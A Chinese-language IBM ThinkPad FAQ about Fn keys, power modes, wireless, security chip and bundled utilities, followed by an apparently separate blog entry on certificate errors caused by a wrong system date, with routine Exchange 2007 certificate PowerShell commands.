34. IBM键盘上的Fn键是干什么用的?它是一个功能非常强大的组合功能键,例如: Fn+F3:关闭液晶屏幕显示, StandBy模式(待机),移动鼠标或按任意键解除。某些机型按Fn+F3不能关闭屏幕 Fn+F4:使机器进入挂起状态,Suspend模式(挂起),所有的任务都被停止并且保存到内存中,除了内存之外所有的设备都被停止,按下Fn键一秒钟以上解除。 Fn+F5:搜索无线网络 Fn+F7切换显示输出状态(LCD,或外接,或同时显示),这是一个循环转换的过程。 Fn+F12:使机器进入休眠状态,Hibernate模式(休眠),所有的任务被停止,并且内存和当前状态被保存到硬盘中,系统关机。 Fn+PgUP:开启或关闭键盘灯 Fn+Home/End:增大/减少屏幕亮度,共有七档。
35. 为什么要使用Fn+F3关闭液晶屏幕显示?当您不想让别人看到您屏幕上的东西或想使电池使用时间更长时您可以选择此功能。
36. 使机器进入挂起状态是什么意思?当您暂时离开机器,但又不想采用关机这种办法时,您为了节省电池电力,可选择挂起这种功能,它会使所有不必须打开的设备全部关闭。例如液晶、硬盘等,而只有CPO供电保持开机状态,当再次使用时,按下Fn键数下即可唤醒。
37. 休眠状态和挂起有什么区别?挂起是一种省电模式,系统将机器的硬盘、显示器等外部设备停止工作,而CPU、内存仍然工作,等待用户随时唤醒,再次唤醒需要按键盘上的Fn键数次。体眠是一种更加省电的模式,它将内存中的数据保存于硬盘中,使CPU也停止工作,当再次使用时需按开关机键,机器将会恢复到您的执行休眠时的状态,而不用再次执行启动Windows这个复杂的过程。
38. 调节屏幕亮度有什么意义?有三点:可保护使用者的视力,当周围环境光线暗时,调亮一点,周围环境光线亮时,调暗一点。可使液晶的使用寿命更长一点,高亮度会缩短使用寿命。可使机器更节电,使用时间更长,高亮度会增大使用电量。
39. 为什么当使用TrackPoint时,会受到TouchPad的干扰?您说的很对,这确实是很多用户碰到的情况,IBM有相应的解决办法提供,您点击开始→程序→Access IBM→UltraNav wizard 可以将下部的TouchPad关闭,这样就解决了这一情况。
40. 为什么有些ThinkPad笔记本电脑(例如T41-GEC)不支持intel迅驰移动计算技术?因为它们使用的不是intel 的802.11b无线网卡,不满足intel迅驰移动计算技术三个前提条件。(它们使用的是IBM 的802.11a/b/g三频段无线网卡)
41. 现在很多的IBM ThinkPad机器中带有蓝牙技术,蓝牙主要有些什么应用吗?蓝牙是一项无线协议标准,可以让支持蓝牙的设备在方圆10M左右的范围内进行无线连接和交换数据,如手机、PDA、笔记本电脑、打印机和其他支持蓝牙的手持设备
42. IBM ThinkPad笔记本的无线天线为什么要设计液晶边框里?因为您肯定很清楚,所有的无线设备都应将天线放置在高端,并且尽量垂直于地面。例如手机等。那么IBM将无线网卡(802.11b)的发射天线放在液晶边框里,很好的契合了上述的两个观点。
43. IBM ThinkPad 笔记本完善的售后服务体系体现在那里? IBM ThinkPad笔记本的很多型号已经可以做到三年的部件保修(有条件)、一年的上门服务。所有这一切的售后服务均由蓝色快车提供。蓝色快车不仅具有非常优良的技术实力和完善的管理能力、反应能力,同时它还具有遍布全国一、二、三级城市的服务网点,可以简单的比喻为“只要铁路可以到达的地方、就会有蓝色快车优质的服务”。
44. 当客户的ThinkPad笔记本电脑或ThinkCentre台式机出现了故障的时候,您可以通过什么途径来获取帮助?购买该设备的电脑经销商;2)购买该设备的IBM ThinkPad体验中心;3)热线电话800-810-1818;4)IBM网站www.ibm.com/pc/cn;5)蓝色驿站www.blue-estation.com。
45. IBM嵌入式安全子系统可以使用哪些认证设备? Targus指纹仪;感应胸卡设备;智能卡。
46. 什么是IBM嵌入式安全子系统? IBM嵌入式安全子系统由硬件和软件两部份组成,分别为嵌入主板的安全芯片和从IBM网站上下载的安全软件。 ThinkPad 集成了独一无二的的嵌入式安全芯片,从硬件级解决安全问题。安全芯片被植于主板内部,用来进行存储和运行专用于数据和程序保护的密码和相关信息。 IBM嵌入式安全子系统帮助用户对文件和文件夹加密,安全登陆和管理密码,并且能够帮助客户实施邮件加密,加强无线传输的加密。
47. IBM ThinkPad 笔记本的安全性体现在那里? IBM ThinkPad笔记本的很多型号在笔记本主板上已经内置了安全芯片,用户只需从IBM网站上下载相应的支持软件(免费)安装就可以了,它能实现软硬兼备、互相弥补的长处,使笔记本无论在应用无线环境时,还是在内部局域网环境时都可实现对文件、文件夹、设置等的完善保护。同时,IBM ThinkPad 笔记本在出厂时就预装了数据备份恢复软件(RRU),使用户硬盘的重要数据得到最大程度的妥善保护。 48. 硬盘动态保护系统简称什么?全称是什么? APS,Active Protection System。
49. 哪个IBM随机应用软件可以实现对不同网络环境配置的设置、保存、及随时切换? IBM Access Connections。 50. 我的IBM ThinkPad笔记本电脑是P-M 1.6G的主频,怎么在机器上看才是P-M 800M的主频呢?因为IBM ThinkPad笔记本电脑采用的intel CPU中含有一项新技术叫intel StepSpeed技术,它会依照笔记本电脑的使用环境来设定CPU的工作频率,当使用电池供电时使用较低的工作频率,这样可以降低CPU的消耗,延长电池的使用时间。
51. IBM键盘上的“Access IBM”键是干什么用的?当笔记本刚开启时,出现IBM图标时按“Access IBM”键,可进入Bios。修改Bios设置及恢复系统等。当笔记本开记进入windows后,按“Access IBM”键可进入“Access IBM”应用程序,它相当于一本非常详细的使用说明书,可使用户详细了解IBM ThinkPad笔记本的结构、使用方法、如何升级等。
52. 为什么IBM ThinkPad笔记本电脑在实际使用时,并不能达到宣传的使用时间?因为用户有很多不同的使用习惯、使用环境、使用方法,而宣传彩页等数据是在一种行业标准情况下测量的结果,而用户如果将屏幕调节的非常亮,在处理大型数据时,硬盘不停的工作,长时间打字使用键盘等情况,都可能导致使用时间变短。
53. IBM ThinkPad笔记本的硬盘防震是什么意思?您肯定非常清楚,硬件是有价的而您自己的宝贵数据是无价的,那么,IBM在笔记本硬盘的下面设计了防震气垫,硬盘和主板的接口也设计了弹簧缓冲装置,这样,可使您的笔记本在受到剧烈冲撞的情况下仍能最大程度的保证硬件不受损。
54. IBM ThinkPad 笔记本的易用性体现在那里? IBM ThinkPad笔记本在出厂时就预装了很多非常实用、简便的工具软件。例如: •Access IBM (带您进入拥有信息和工具的主机) •Battery MaxiMiser Wizard (管理电池设备) •EasyEject Utility (关闭连接的设备以备拆卸) •IBM Access connections (简便切换连接设置) •resentation Director (调整视频设备(包含投影仪)的设置) •ThinkPad Configuration (查看或更改Windows检测到的设备的位置) •ThinkPad Software installer (查看或更改软件安装情况) •UltraNav Wizard (随机指点设备设置) •IBM Rapid Restore Ultra (快速备份恢复软件)
55. IBM ThinkPad 笔记本的无线解决方案优越性体现在那里? IBM ThinkPad笔记本的很多型号都已经内置了无线网卡的天线(在液晶屏的边框内),同时即使没有无线网卡(802.11b)和蓝牙技术(BlueTooth)的机型,也可以非常方便的升级为拥有无线网卡(802.11b)和蓝牙技术(BlueTooth)的机型。另一方面,IBM ThinkPad笔记本的很多型号都可以做到5-9小时的待机时间(有些型号需要配件支持)。使用户应用无线环境时可以更加的游刃有余、轻松自如。 大大领导的本本(已加入域)收邮件再次出现的证书安装提示,并且无法使用网络共享打印;驻外同事电脑(工作组)无法如何安装证书都提示证书已过期。 2个问题,看似毫不相关,其实,仅仅是时间和日期不正确所导致。第一个问题是早间提前了1个月加15分钟,致使无法正常登录;于是无法共享网络中的打印机,证书因时间原因也出现错误无法生效再次提示。第二个问题也比较典型,我反复查阅了证书服务器及所申请的证书以及笔记本时间,感觉是完全正常的,但反反复复提示“申请的证书已过期或无效”,折腾了好几个小时,在服务器上确实未发现问题,最后严格检测电脑时间才知,2008.06.04的今天在笔记本电脑上显示的是2000.06.04,时间倒是没有什么问题。年份更改正确后,证书安装一切都是那么正常...... 想想2天来浪费这2个问题上的时间,狂晕! 下面附上EXCHANGE2007做证书的ps命令 New-ExchangeCertificate -PrivateKeyExportable $true -GenerateRequest -SubjectName "dc=com,dc=dnschina,dc=sz,o=D&S inc,cn=mailsvr.sz.dnschina.com" -DomainName mailsvr,ds.pri,sz.dnschina.com,mailsvr.ds.pri,mailsvr.sz.dnschina.com,autodiscover.sz.dnschina.com,autodiscover.ds.pri,mail.sz.dnschina.com -Path c:\certrequest_sz2.txt IIS申请高级证书(拷贝TXT中的内容,选择web证书服务),导出到c:\certnewok2.cer Import-ExchangeCertificate -path c:\certnewok2.cer -friendlyname "sz.dnschina.com ds.pri" | Enable-ExchangeCertificate -Services pop,imap,smtp,iis 查看某一帐户的邮件存储中收件箱大小。 Get-MailboxFolderStatistics -Identity emailbk -FolderScope inbox
|
Tools 
